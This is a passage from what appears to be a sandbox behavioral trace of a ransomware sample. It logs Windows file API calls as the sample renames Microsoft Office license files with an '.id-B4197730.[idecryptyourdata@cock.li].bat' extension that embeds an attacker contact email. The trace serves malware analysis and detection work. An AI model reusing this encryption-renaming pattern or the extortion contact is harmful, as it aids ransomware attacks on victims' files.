dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.209] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointVL_MAK-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointvl_mak-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.209] CloseHandle (hObject=0x52c) returned 1 [0164.210] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.210] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.210] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointVL_MAK-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointvl_mak-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.211] CloseHandle (hObject=0x52c) returned 1 [0164.212] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.212] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.212] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalDemoR_BypassTrial180-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionaldemor_bypasstrial180-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.212] CloseHandle (hObject=0x52c) returned 1 [0164.213] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.213] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.213] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalDemoR_BypassTrial180-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionaldemor_bypasstrial180-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.214] CloseHandle (hObject=0x52c) returned 1 [0164.214] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.214] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.214] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalDemoR_BypassTrial180-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionaldemor_bypasstrial180-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.215] CloseHandle (hObject=0x52c) returned 1 [0164.215] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.216] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.216] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalPipcR_Grace-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalpipcr_grace-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.216] CloseHandle (hObject=0x52c) returned 1 [0164.217] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.217] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.217] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalPipcR_Grace-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalpipcr_grace-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.217] CloseHandle (hObject=0x52c) returned 1 [0164.218] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.218] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.218] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalPipcR_OEM_Perp-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalpipcr_oem_perp-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.218] CloseHandle (hObject=0x52c) returned 1 [0164.219] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.219] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.219] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalPipcR_OEM_Perp-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalpipcr_oem_perp-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.219] CloseHandle (hObject=0x52c) returned 1 [0164.220] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.220] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.220] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalPipcR_OEM_Perp-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalpipcr_oem_perp-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.220] CloseHandle (hObject=0x52c) returned 1 [0164.221] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.221] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.221] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalPipcR_OEM_Perp-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalpipcr_oem_perp-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.222] CloseHandle (hObject=0x52c) returned 1 [0164.222] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.222] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.222] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Grace-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_grace-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.222] CloseHandle (hObject=0x52c) returned 1 [0164.223] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.223] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.223] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Grace-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_grace-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.224] CloseHandle (hObject=0x52c) returned 1 [0164.224] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.224] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.224] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_OEM_Perp-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_oem_perp-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.225] CloseHandle (hObject=0x52c) returned 1 [0164.225] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.225] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.225] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_OEM_Perp-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_oem_perp-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.616] CloseHandle (hObject=0x52c) returned 1 [0164.617] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.617] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.617] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_OEM_Perp-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_oem_perp-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.617] CloseHandle (hObject=0x52c) returned 1 [0164.618] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.618] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.618] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_OEM_Perp-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_oem_perp-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.618] CloseHandle (hObject=0x52c) returned 1 [0164.619] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.619] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.619] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_OEM_Perp-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_oem_perp-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.619] CloseHandle (hObject=0x52c) returned 1 [0164.620] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.620] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.620] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_OEM_Perp-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_oem_perp-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.621] CloseHandle (hObject=0x52c) returned 1 [0164.621] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.621] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.621] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_Retail-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_retail-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.622] CloseHandle (hObject=0x52c) returned 1 [0164.622] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.622] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.622] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_Retail-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_retail-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.623] CloseHandle (hObject=0x52c) returned 1 [0164.623] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.623] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.624] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_Retail-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_retail-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.624] CloseHandle (hObject=0x52c) returned 1 [0164.624] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.625] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.625] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_Retail-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_retail-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.625] CloseHandle (hObject=0x52c) returned 1 [0164.626] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.626] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.626] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdVL_KMS_Client-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdvl_kms_client-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.626] CloseHandle (hObject=0x52c) returned 1 [0164.627] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.627] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.627] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdVL_KMS_Client-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdvl_kms_client-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.627] CloseHandle (hObject=0x52c) returned 1 [0164.628] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.628] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.628] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdVL_KMS_Client-ul.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdvl_kms_client-ul.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.628] CloseHandle (hObject=0x52c) returned 1 [0164.631] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.631] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.632] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdVL_MAK-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdvl_mak-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.632] CloseHandle (hObject=0x52c) returned 1 [0164.633] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.634] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.634] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdVL_MAK-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdvl_mak-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.634] CloseHandle (hObject=0x52c) returned 1 [0164.635] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.635] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.635] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdVL_MAK-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdvl_mak-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.635] CloseHandle (hObject=0x52c) returned 1 [0164.636] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.636] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.636] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdVL_MAK-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdvl_mak-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.636] CloseHandle (hObject=0x52c) returned 1 [0164.637] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.637] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.637] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusDemoR_BypassTrial180-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusdemor_bypasstrial180-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.637] CloseHandle (hObject=0x52c) returned 1 [0164.638] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: 